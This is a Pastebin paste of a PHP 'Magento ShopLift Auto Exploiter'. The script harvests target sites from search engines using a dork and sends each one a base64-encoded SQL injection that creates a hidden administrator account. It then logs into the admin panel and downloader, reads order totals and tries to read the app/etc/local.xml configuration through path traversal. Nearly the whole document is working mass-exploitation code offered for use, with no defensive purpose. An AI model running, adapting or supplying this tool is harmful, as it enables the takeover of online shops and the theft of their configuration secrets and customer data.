API tools faq
paste
Guest User

Untitled

a guest
Jun 29th, 2016
80
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.75 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. set_time_limit(0);
  3. class FathurFreak {
  4. private $dork = "";
  5. private $username = "pak";
  6. private $password = "haxor123";
  7.  
  8. public function Dork($dork){
  9. $this->dork = $dork;
  10. return $this->dork;
  11. }
  12.  
  13. private function CurlPost($url, $post = false){
  14. $ch = curl_init();
  15. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  16. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  17. curl_setopt($ch, CURLOPT_URL, $url);
  18. curl_setopt($ch, CURLOPT_HEADER, 0);
  19. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  20. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  21. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  22. if($post !== false){
  23. $isi = '';
  24. foreach($post as $key=>$value){
  25. $isi .= $key.'='.$value.'&';
  26. }
  27. rtrim($isi, '&');
  28. curl_setopt($ch, CURLOPT_URL, $url);
  29. curl_setopt($ch, CURLOPT_POST, count($isi));
  30. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  31. curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
  32. }
  33. $data = curl_exec($ch);
  34. curl_close($ch);
  35. return $data;
  36. }
  37.  
  38. private function GetStr($start,$end,$string){
  39. $a = explode($start,$string);
  40. $b = explode($end,$a[1]);
  41. return $b[0];
  42. }
  43.  
  44. private function LoginDownloader($url){
  45. $link = parse_url($url);
  46. $data = $this->CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
  47. array("username" => $this->username,
  48. "password" => $this->password)
  49. );
  50. if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
  51. $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
  52. return "Success\nPermission\t\t: ".$permission;
  53. $smtp = (!eregi("Smtp",$data) || !eregi("Mandrill",$data) || !eregi("smtp",$data) ? "Smtp Look" : "Ga Ada Smtp");
  54. return "Success\nSmtpPro\t\t: ".$smtp;
  55. $filesystem = (!eregi("File_System",$data) ? "File System Ada" : "No");
  56. return "Success\nFile system\t\t: ".$filesystem;
  57. } else {
  58. return "Failed";
  59. }
  60. }
  61.  
  62. private function LoginAdmin($target){
  63. $link = parse_url($target);
  64. $get = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]));
  65. $key = $this->GetStr("<input name=\"form_key\" type=\"hidden\" value=\"","\" />",$get);
  66. $data = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]),
  67. array("login[username]" => $this->username,
  68. "login[password]" => $this->password,
  69. "form_key" => $key)
  70. );
  71. if($this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]))){
  72. return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data)."\nInstaled\t\t: ".$this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]));
  73. } else {
  74. return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data);
  75. }
  76. }
  77.  
  78. private function ShopLiftExploit($target){
  79. $email = substr(md5(time()),2,15);
  80. $link = parse_url($target);
  81. $data = $this->CurlPost(sprintf("%s://%s/admin/Cms_Wysiwyg/directive/index/",$link["scheme"],$link["host"]),
  82. array("filter" => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{$this->password}') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','{$email}@telekpitekwashere.cok','{$this->username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{$this->username}'),'Firstname');"),
  83. "___directive" => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
  84. "forwarded" => "1")
  85. );
  86. return (@imagecreatefromstring($data) !== false);
  87. }
  88.  
  89. private function ExecuteExploit($victim){
  90. $file = fopen("ShopLift-".date("d-m-Y").".log","a");
  91. $url = parse_url($victim);
  92. $target = (!isset($url["scheme"]) ? "http://".$victim : $url["scheme"]."://".$url["host"]);
  93. if($this->ShopLiftExploit($target)){
  94. $downloader = $this->LoginDownloader($target);
  95. $admin = $this->LoginAdmin($target);
  96. $result = "\n============[ShopLift Result]============\nSite\t\t\t: {$target}\nLogin Admin\t\t: {$admin}\nLogin Downloader\t: {$downloader}\n===========================================\n";
  97. fwrite($file,$result);
  98. return $result;
  99. }else {
  100. return "[".date("H:i:s")."] ".$target." => Not vuln !\n";
  101. }
  102.  
  103. fclose($file);
  104. }
  105.  
  106.  
  107. private function LocalFileDiscloure($target){
  108. $path = array( "/app/etc/local.xml",
  109. "/magmi/web/download_file.php?file=../../app/etc/local.xml"
  110. );
  111. for($i=0;$i<=count($path);$i++){
  112. $test = $this->CurlPost($target.$path[$i]);
  113. if(isset($test) && preg_match('/install/i',$test) && preg_match('/date/i',$test)){
  114. return $this->GetStr("<date><![CDATA[","]]></date>",$test);
  115. } else {
  116. return false;
  117. }
  118. }
  119. }
  120.  
  121. public function SearchEngine($engine){
  122. $list = array();
  123. $ccbing = array("ca","br","be","nl","uk","it","es","de","no","dk","se","ch","ru","jp","cn","kr","mx","ar","cl","au");
  124. $ccgoogle = array("co.uk");//,"com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
  125. $ccask = array("au","uk","ca","de","it","fr","es","ru","nl","pl","at","se","dk","no","br","mx","jp");
  126. $ccyahoo = array("au","ru","at","pl","il","tr","ua","gr","jp","cn","my","id","th","in","kr","tw","ro","za","pt","ca","uk","de","fr","es","it","hk","mx","br","ar","nl","dk","ph","cl","ru","co","fi","ve","nz","pe");
  127. switch($engine){
  128. /*case 1:
  129. for($i=0;$i<=1000;$i+=10){
  130. $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($this->dork)."&first=".$i);
  131. preg_match_all('#<h2><a href="(.*?)" h="ID#', $search, $m);
  132. foreach($m[1] as $link){
  133. if(!preg_match("/live|msn|bing|microsoft/",$link)){
  134. if(!in_array($link,$list)){
  135. $list[] = $link;
  136. }
  137. }
  138. }
  139. echo "[".date("H:i:s")."] Catch Bing (".count(array_unique($m[1])).")\n";
  140. }
  141. echo "[".date("H:i:s")."] Total Bing : ".count($list)."\n";
  142. break;
  143. case 2:
  144. for($x=0;$x<=count($ccbing)-1;$x++){
  145. for($i=0;$i<=1000;$i+=10){
  146. $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($this->dork)."&cc=".$ccbing[$x]."&rf=1&first=".$i."&FORM=PORE");
  147. preg_match_all('#<h2><a href="(.*?)" h="ID#', $search, $m);
  148. foreach($m[1] as $link){
  149. if(!preg_match("/live|msn|bing|microsoft/",$link)){
  150. if(!in_array($link,$list)){
  151. $list[] = $link;
  152. }
  153. }
  154. }
  155. echo "[".date("H:i:s")."] Catch Bing.".$ccbing[$x]." (".count(array_unique($m[1])).")\n";
  156. }
  157. }
  158. echo "[".date("H:i:s")."] Total Bing World : ".count($list)."\n";
  159. break;
  160. case 3:
  161. for($x=0;$x<=count($ccgoogle)-1;$x++){
  162. for($i=0;$i<=200;$i+=10){
  163. $search = $this->CurlPost("http://www.google.".$ccgoogle[$x]."/search?num=50&q=".urlencode($this->dork)."&start=".$i."&sa=N");
  164. preg_match_all('/<a href=\"?http:\/\/([^>\"]*)\//m', $search, $m);
  165. foreach($m[1] as $link){
  166. if(!preg_match("/google/",$link)){
  167. if(!in_array($link,$list)){
  168. $list[] = $link;
  169. }
  170. }
  171. }
  172. echo "[".date("H:i:s")."] Catch Google.".$ccgoogle[$x]." (".count(array_unique($m[1])).")\n";
  173. }
  174. }
  175. echo "[".date("H:i:s")."] Total Google World : ".count($list)."\n";
  176. break;*/
  177. /*case 4:
  178. for($x=0;$x<=count($ccask)-1;$x++){
  179. for($i=1;$i<=1000;$i+=100){
  180. $search = $this->CurlPost("http://".$ccask[$x].".ask.com/web?q=".urlencode($this->dork)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
  181. preg_match_all('/href=\"http:\/\/(.*?)\" onmousedown=/m', $search, $m);
  182. foreach($m[1] as $link){
  183. if(!preg_match("/ask\.com/",$link)){
  184. if(!in_array($link,$list)){
  185. $list[] = $link;
  186. }
  187. }
  188. }
  189. echo "[".date("H:i:s")."] Catch Ask.".$ccask[$x]."(".count(array_unique($m[1])).")\n";
  190. }
  191. }
  192. echo "[".date("H:i:s")."] Total Ask World : ".count($list)."\n";
  193. break;
  194. case 5:
  195. for($i=1;$i<=100;$i+=1){
  196. $search = $this->CurlPost("http://search.walla.co.il/?q=".urlencode($this->dork)."&type=text&page=".$i);
  197. preg_match_all('/<a href=\"http:\/\/(.+?)\" title=/m', $search, $m);
  198. foreach($m[1] as $link){
  199. if(!preg_match("/walla\.co\.il/",$link)){
  200. if(!in_array($link,$list)){
  201. $list[] = $link;
  202. }
  203. }
  204. }
  205. echo "[".date("H:i:s")."] Catch Walla (".count(array_unique($m[1])).")\n";
  206. }
  207. echo "[".date("H:i:s")."] Total Walla : ".count($list)."\n";
  208. break;
  209. case 6:
  210. for($i=1;$i<=400;$i+=10){
  211. $search = $this->CurlPost("http://szukaj.onet.pl/".$i.",query.html?qt=".urlencode($this->dork));
  212. preg_match_all('/<a href=\"http:\/\/(.*?)\">/m', $search, $m);
  213. foreach($m[1] as $link){
  214. if(!preg_match("/onet|webcache|query/",$link)){
  215. if(!in_array($link,$list)){
  216. $list[] = $link;
  217. }
  218. }
  219. }
  220. echo "[".date("H:i:s")."] Catch Onet (".count(array_unique($m[1])).")\n";
  221. }
  222. echo "[".date("H:i:s")."] Total Onet : ".count($list)."\n";
  223. break;
  224. case 7:
  225. for($i=1;$i<=50;$i+=1){
  226. $search = $this->CurlPost("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$i."&q=".urlencode($this->dork)."&st=local");
  227. preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
  228. foreach($m[1] as $link){
  229. if(!preg_match("/\.sapo\.pt/",$link)){
  230. if(!in_array($link,$list)){
  231. $list[] = $link;
  232. }
  233. }
  234. }
  235. echo "[".date("H:i:s")."] Catch Sapo (".count(array_unique($m[1])).")\n";
  236. }
  237. echo "[".date("H:i:s")."] Total Sapo : ".count($list)."\n";
  238. break;
  239. case 8:
  240. for($i=1;$i<=50;$i+=1){
  241. $search = $this->CurlPost("http://search.lycos.com/web?q=".urlencode($this->dork)."&pn=".$i);
  242. preg_match_all('/title=\"http:\/\/(.*?)\"/m', $search, $m);
  243. foreach($m[1] as $link){
  244. if(!preg_match("/lycos/",$link)){
  245. if(!in_array($link,$list)){
  246. $list[] = $link;
  247. }
  248. }
  249. }
  250. echo "[".date("H:i:s")."] Catch Lycos (".count(array_unique($m[1])).")\n";
  251. }
  252. echo "[".date("H:i:s")."] Total Lycos : ".count($list)."\n";
  253. break;
  254. case 9:
  255. for($i=1;$i<=1000;$i+=10){
  256. $search = $this->CurlPost("http://busca.uol.com.br/web/?ref=homeuol&q=".urlencode($this->dork)."&start=".$i);
  257. preg_match_all('/href=\"?http:\/\/([^\">]*)\"/m', $search, $m);
  258. foreach($m[1] as $link){
  259. if(!preg_match("/uol\.com\.br|\/web/i",$link)){
  260. if(!in_array($link,$list)){
  261. $list[] = $link;
  262. }
  263. }
  264. }
  265. echo "[".date("H:i:s")."] Catch Aol (".count(array_unique($m[1])).")\n";
  266. }
  267. echo "[".date("H:i:s")."] Total Uol : ".count($list)."\n";
  268. break;
  269. case 10:
  270. for($i=1;$i<=300;$i+=20){
  271. $search = $this->CurlPost("http://search.seznam.cz/?q=".urlencode($this->dork)."&count=20&from=".$i);
  272. preg_match_all('/href=\"?http:\/\/([^\">]*)\"/m', $search, $m);
  273. foreach($m[1] as $link){
  274. if(!preg_match("/seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i",$link)){
  275. if(!in_array($link,$list)){
  276. $list[] = $link;
  277. }
  278. }
  279. }
  280. echo "[".date("H:i:s")."] Catch Seznam (".count(array_unique($m[1])).")\n";
  281. }
  282. echo "[".date("H:i:s")."] Total Seznam : ".count($list)."\n";
  283. break;*/
  284. case 11:
  285. for($i=1;$i<=50;$i+=1){
  286. $ch1 =curl_init("http://www.hotbot.com/");
  287. curl_setopt($ch1, CURLOPT_RETURNTRANSFER, 1);
  288. $keyvoll = curl_exec($ch1);
  289. curl_close($ch1);
  290. $ma=preg_match("/\.val\('(.*?)'\);/",$keyvoll,$ke);
  291. $ch=curl_init();
  292. $search = $this->CurlPost("http://www.hotbot.com/search/web?pn=".$i."&q=".urlencode($this->dork)."&keyvol=".$ke[1]);
  293. preg_match_all('#<span class="web-baseuri">(.*?)</span>#', $search, $m);
  294. foreach($m[1] as $link){
  295.  
  296. if(!in_array($link,$list)){
  297. $list[] = $link;
  298. }
  299. }
  300.  
  301. echo "[".date("H:i:s")."] Catch Hotbot (".count(array_unique($m[1])).")\n";
  302. }
  303. echo "[".date("H:i:s")."] Total Hotbot : ".count($list)."\n";
  304. break;
  305. case 12:
  306. for($i=1;$i<=300;$i+=10){
  307. $search = $this->CurlPost("http://search.aol.com/aol/search?q=".urlencode($this->dork)."&page=".$i);
  308. preg_match_all('/href=\"http:\/\/(.*?)\"/m', $search, $m);
  309. foreach($m[1] as $link){
  310. if(!preg_match("/aol\.com/",$link)){
  311. if(!in_array($link,$list)){
  312. $list[] = $link;
  313. }
  314. }
  315. }
  316. echo "[".date("H:i:s")."] Catch Aol (".count(array_unique($m[1])).")\n";
  317. }
  318. echo "[".date("H:i:s")."] Total Aol : ".count($list)."\n";
  319. break;
  320. /* case 13:
  321. for($i=1;$i<=1000;$i+=10){
  322. $search = $this->CurlPost("http://search.yahoo.com/search?p=".urlencode($this->dork)."&b=".$i);
  323. preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
  324. foreach($m[1] as $link){
  325. if(!preg_match("/yahoo/",$link)){
  326. if(!in_array($link,$list)){
  327. $list[] = $link;
  328. }
  329. }
  330. }
  331. echo "[".date("H:i:s")."] Catch Yahoo (".count(array_unique($m[1])).")\n";
  332. }
  333. echo "[".date("H:i:s")."] Total Yahoo : ".count($list)."\n";
  334. break; */
  335. /* case 14:
  336. for($x=0;$x<=count($ccyahoo)-1;$x++){
  337. for($i=1;$i<=1000;$i+=100){
  338. $search = $this->CurlPost("http://".$ccyahoo[$x].".search.yahoo.com/search;_ylt=A0geu8nrPalPnkQAVmPrFAx.?p=".urlencode($this->dork)."&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vst=0&vf=all&vc=hk&vm=p&fl=0&fr=yfp-t-501&fp_ip=11&xargs=0&pstart=1&b=".$i);
  339. preg_match_all('/<a href=\"http:\/\/(.*?)\"/m', $search, $m);
  340. foreach($m[1] as $link){
  341. if(!preg_match("/yahoo".$ccyahoo[$x]."/",$link)){
  342. if(!in_array($link,$list)){
  343. $list[] = $link;
  344. }
  345. }
  346. }
  347. echo "[".date("H:i:s")."] Catch Yahoo.".$ccyahoo[$x]." (".count(array_unique($m[1])).")\n";
  348. }
  349. }
  350. echo "[".date("H:i:s")."] Total Yahoo World : ".count($list)."\n";
  351. break; */
  352. }
  353. if(count($list)>0){
  354. echo "Exploiting target ".count($list).". Please wait ... \n";
  355. foreach($list as $do){
  356. echo $this->ExecuteExploit($do);
  357. }
  358. }
  359. }
  360.  
  361. public function ExploitLogo(){
  362. $logo = "==================================================\n";
  363. $logo .= "#\t Magento ShopLift Auto Exploiter \t #\n";
  364. $logo .= "#------------------------------------------------#\n";
  365. $logo .= "#\t Usage \t\t: php ".basename($_SERVER["SCRIPT_FILENAME"], '.php').".php \"Dork\"\t #\n";
  366. $logo .= "#------------------------------------------------#\n";
  367. $logo .= "#\t (C) ".date("Y")." \t\t #\n";
  368. $logo .= "==================================================\n";
  369. echo $logo;
  370. }
  371. }
  372. $Exploiter = new FathurFreak();
  373. if(isset($argv[1]) && !empty($argv[1])){
  374. if($argv[1]=="-l" && !empty($argv[2])){
  375. $file = file_get_contents($argv[2]);
  376. $list = explode("\n",$file);
  377. if(isset($list)){
  378. echo "Starting engine ....\n";
  379. flush();
  380. sleep(2);
  381. echo "[".date("H:i:s")."] Scanning ".count($list)." dorks. Please wait ... \n";
  382. foreach($list as $dork){
  383. echo "[".date("H:i:s")."] Scanning target for dork : {$dork}\n";
  384. $Exploiter->Dork($dork);
  385. for($i=0;$i<15;$i++){
  386. $Exploiter->SearchEngine($i);
  387. flush();
  388. sleep(1);
  389. }
  390. }
  391. }
  392. } else {
  393. echo "Starting engine ....\n";
  394. flush();
  395. sleep(2);
  396. echo "[".date("H:i:s")."] Scanning target for dork : {$argv[1]}\n";
  397. $Exploiter->Dork($argv[1]);
  398. for($i=0;$i<15;$i++){
  399. $Exploiter->SearchEngine($i);
  400. flush();
  401. sleep(1);
  402. }
  403. }
  404. echo "Scan finished !!!\n";
  405. flush();
  406. sleep(1);
  407. echo "Shuting down engine !!!\n";
  408. } else {
  409. $Exploiter->ExploitLogo();
  410. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!